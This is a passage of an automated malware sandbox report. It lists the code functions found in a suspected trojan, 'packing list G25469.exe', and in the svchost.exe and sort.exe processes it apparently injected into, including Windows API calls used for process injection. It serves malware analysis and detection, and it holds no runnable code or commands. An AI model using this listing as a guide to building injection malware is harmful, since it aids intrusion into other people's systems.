                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02CA2BE0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02CA2BF0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02CA2BA0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2B60 NtClose,LdrInitializeThunk,5_2_02CA2B60
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02CA2EE0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02CA2E80
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2FE0 NtCreateFile,LdrInitializeThunk,5_2_02CA2FE0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2FB0 NtResumeThread,LdrInitializeThunk,5_2_02CA2FB0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2F30 NtCreateSection,LdrInitializeThunk,5_2_02CA2F30
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02CA2CA0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2C60 NtCreateKey,LdrInitializeThunk,5_2_02CA2C60
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02CA2C70
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2DD0 NtDelayExecution,LdrInitializeThunk,5_2_02CA2DD0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02CA2DF0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02CA2D10
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02CA2D30
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA35C0 NtCreateMutant,LdrInitializeThunk,5_2_02CA35C0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA39B0 NtGetContextThread,LdrInitializeThunk,5_2_02CA39B0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2AB0 NtWaitForSingleObject,5_2_02CA2AB0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2B80 NtQueryInformationFile,5_2_02CA2B80
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2EA0 NtAdjustPrivilegesToken,5_2_02CA2EA0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2E30 NtWriteVirtualMemory,5_2_02CA2E30
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2F90 NtProtectVirtualMemory,5_2_02CA2F90
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2FA0 NtQuerySection,5_2_02CA2FA0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2F60 NtCreateProcessEx,5_2_02CA2F60
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2CC0 NtQueryVirtualMemory,5_2_02CA2CC0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2CF0 NtOpenProcess,5_2_02CA2CF0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2C00 NtQueryInformationProcess,5_2_02CA2C00
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2DB0 NtEnumerateKey,5_2_02CA2DB0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA2D00 NtSetInformationFile,5_2_02CA2D00
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA3090 NtSetValueKey,5_2_02CA3090
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA3010 NtOpenDirectoryObject,5_2_02CA3010
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA3D70 NtOpenThread,5_2_02CA3D70
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA3D10 NtOpenProcessToken,5_2_02CA3D10
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_00429000 NtCreateFile,5_2_00429000
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_00429170 NtReadFile,5_2_00429170
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_00429260 NtDeleteFile,5_2_00429260
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_00429300 NtClose,5_2_00429300
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_00429460 NtAllocateVirtualMemory,5_2_00429460
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B76685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00B76685
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B6ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B6ACC5
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B779D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00B779D3
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B5B0430_2_00B5B043
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B432000_2_00B43200
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B43B700_2_00B43B70
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B6410F0_2_00B6410F
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B502A40_2_00B502A4
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B3E3B00_2_00B3E3B0
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B6038E0_2_00B6038E
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B506D90_2_00B506D9
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B6467F0_2_00B6467F
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B9AACE0_2_00B9AACE
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B64BEF0_2_00B64BEF
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B5CCC10_2_00B5CCC1
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B36F070_2_00B36F07
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B3AF500_2_00B3AF50
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B931BC0_2_00B931BC
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B5D1B90_2_00B5D1B9
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B4B11F0_2_00B4B11F
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B5123A0_2_00B5123A
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B6724D0_2_00B6724D
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B393F00_2_00B393F0
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B713CA0_2_00B713CA
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B4F5630_2_00B4F563
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B396C00_2_00B396C0
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B7B6CC0_2_00B7B6CC
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B377B00_2_00B377B0
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B9F7FF0_2_00B9F7FF
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B679C90_2_00B679C9
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B4FA570_2_00B4FA57
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B39B600_2_00B39B60
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B37D190_2_00B37D19
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B59ED00_2_00B59ED0
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B4FE6F0_2_00B4FE6F
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B37FA30_2_00B37FA3
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_0134ADA00_2_0134ADA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004185632_2_00418563
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100732_2_00410073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E0F32_2_0040E0F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011802_2_00401180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022FA2_2_004022FA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EB732_2_0042EB73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023002_2_00402300
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C302_2_00402C30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE4A2_2_0040FE4A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026502_2_00402650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE532_2_0040FE53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FE02_2_00402FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004167A32_2_004167A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A003E62_2_03A003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F02_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA3522_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C02C02_2_039C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E02742_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A001AA2_2_03A001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F81CC2_2_039F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA1182_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039301002_2_03930100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C81582_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D20002_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C02_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039647502_2_03964750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039407702_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C6E02_2_0395C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A005912_2_03A00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039405352_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EE4F62_2_039EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E44202_2_039E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F24462_2_039F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F6BD72_2_039F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB402_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA802_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0A9A62_2_03A0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A02_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039569622_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039268B82_2_039268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E8F02_2_0396E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394A8402_2_0394A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039428402_2_03942840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BEFA02_2_039BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932FC82_2_03932FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394CFE02_2_0394CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960F302_2_03960F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E2F302_2_039E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03982F282_2_03982F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4F402_2_039B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952E902_2_03952E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FCE932_2_039FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEEDB2_2_039FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393AE0D2_2_0393AE0D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEE262_2_039FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940E592_2_03940E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03958DBF2_2_03958DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DCD1F2_2_039DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394AD002_2_0394AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0CB52_2_039E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930CF22_2_03930CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940C002_2_03940C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0398739A2_2_0398739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F132D2_2_039F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392D34C2_2_0392D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039452A02_2_039452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B2C02_2_0395B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E12ED2_2_039E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394B1B02_2_0394B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0B16B2_2_03A0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392F1722_2_0392F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397516C2_2_0397516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EF0CC2_2_039EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039470C02_2_039470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F70E92_2_039F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF0E02_2_039FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF7B02_2_039FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F16CC2_2_039F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DD5B02_2_039DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F75712_2_039F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF43F2_2_039FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039314602_2_03931460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FB802_2_0395FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B5BF02_2_039B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397DBF92_2_0397DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFB762_2_039FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DDAAC2_2_039DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03985AA02_2_03985AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E1AA32_2_039E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EDAC62_2_039EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFA492_2_039FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7A462_2_039F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B3A6C2_2_039B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D59102_2_039D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039499502_2_03949950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B9502_2_0395B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039438E02_2_039438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AD8002_2_039AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03941F922_2_03941F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFFB12_2_039FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD22_2_03903FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD52_2_03903FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFF092_2_039FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03949EB02_2_03949EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FDC02_2_0395FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F1D5A2_2_039F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03943D402_2_03943D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7D732_2_039F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFCF22_2_039FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B9C322_2_039B9C32
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CF02C05_2_02CF02C0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D102745_2_02D10274
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D303E65_2_02D303E6
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C7E3F05_2_02C7E3F0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D2A3525_2_02D2A352
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D020005_2_02D02000
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D281CC5_2_02D281CC
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D301AA5_2_02D301AA
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CF81585_2_02CF8158
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C601005_2_02C60100
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D0A1185_2_02D0A118
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C8C6E05_2_02C8C6E0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C6C7C05_2_02C6C7C0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C947505_2_02C94750
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C707705_2_02C70770
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D1E4F65_2_02D1E4F6
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D224465_2_02D22446
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D305915_2_02D30591
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C705355_2_02C70535
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C6EA805_2_02C6EA80
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D26BD75_2_02D26BD7
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D2AB405_2_02D2AB40
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C9E8F05_2_02C9E8F0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C568B85_2_02C568B8
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C728405_2_02C72840
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C7A8405_2_02C7A840
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C729A05_2_02C729A0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D3A9A65_2_02D3A9A6
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C869625_2_02C86962
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D2EEDB5_2_02D2EEDB
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D2CE935_2_02D2CE93
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C82E905_2_02C82E90
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C70E595_2_02C70E59
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D2EE265_2_02D2EE26
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C62FC85_2_02C62FC8
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C7CFE05_2_02C7CFE0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CEEFA05_2_02CEEFA0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CE4F405_2_02CE4F40
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CB2F285_2_02CB2F28
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C90F305_2_02C90F30
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C60CF25_2_02C60CF2
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D10CB55_2_02D10CB5
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C70C005_2_02C70C00
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C6ADE05_2_02C6ADE0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C88DBF5_2_02C88DBF
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C7AD005_2_02C7AD00
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C8B2C05_2_02C8B2C0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D112ED5_2_02D112ED
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C752A05_2_02C752A0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CB739A5_2_02CB739A
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C5D34C5_2_02C5D34C
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D2132D5_2_02D2132D
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C770C05_2_02C770C0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D1F0CC5_2_02D1F0CC
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D2F0E05_2_02D2F0E0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D270E95_2_02D270E9
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C7B1B05_2_02C7B1B0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CA516C5_2_02CA516C
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C5F1725_2_02C5F172
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D3B16B5_2_02D3B16B
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D216CC5_2_02D216CC
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D2F7B05_2_02D2F7B0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C614605_2_02C61460
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D2F43F5_2_02D2F43F
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D0D5B05_2_02D0D5B0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D275715_2_02D27571
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D1DAC65_2_02D1DAC6
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CB5AA05_2_02CB5AA0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D0DAAC5_2_02D0DAAC
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D27A465_2_02D27A46
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D2FA495_2_02D2FA49
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CE3A6C5_2_02CE3A6C
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CADBF95_2_02CADBF9
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CE5BF05_2_02CE5BF0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C39B805_2_02C39B80
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C8FB805_2_02C8FB80
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D2FB765_2_02D2FB76
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C738E05_2_02C738E0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CDD8005_2_02CDD800
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C799505_2_02C79950
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C8B9505_2_02C8B950
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C79EB05_2_02C79EB0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C33FD25_2_02C33FD2
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C33FD55_2_02C33FD5
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C71F925_2_02C71F92
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D2FFB15_2_02D2FFB1
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D2FF095_2_02D2FF09
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D2FCF25_2_02D2FCF2
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02CE9C325_2_02CE9C32
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C8FDC05_2_02C8FDC0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02C73D405_2_02C73D40
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D21D5A5_2_02D21D5A
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02D27D735_2_02D27D73
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_00411CD05_2_00411CD0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_004153105_2_00415310
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_004135505_2_00413550
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_0042B9205_2_0042B920
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_0040CBF75_2_0040CBF7
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_0040CC005_2_0040CC00
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_0041ED505_2_0041ED50
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_0040CE205_2_0040CE20
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_0040AEA05_2_0040AEA0
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02A1E2A65_2_02A1E2A6
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02A1E3C35_2_02A1E3C3
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02A1E7625_2_02A1E762
                Source: C:\Windows\SysWOW64\sort.exeCode function: 5_2_02A1D8285_2_02A1D828
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: String function: 00B56AC0 appears 42 times
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: String function: 00B4EC2F appears 68 times
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: String function: 00B5F8A0 appears 35 times
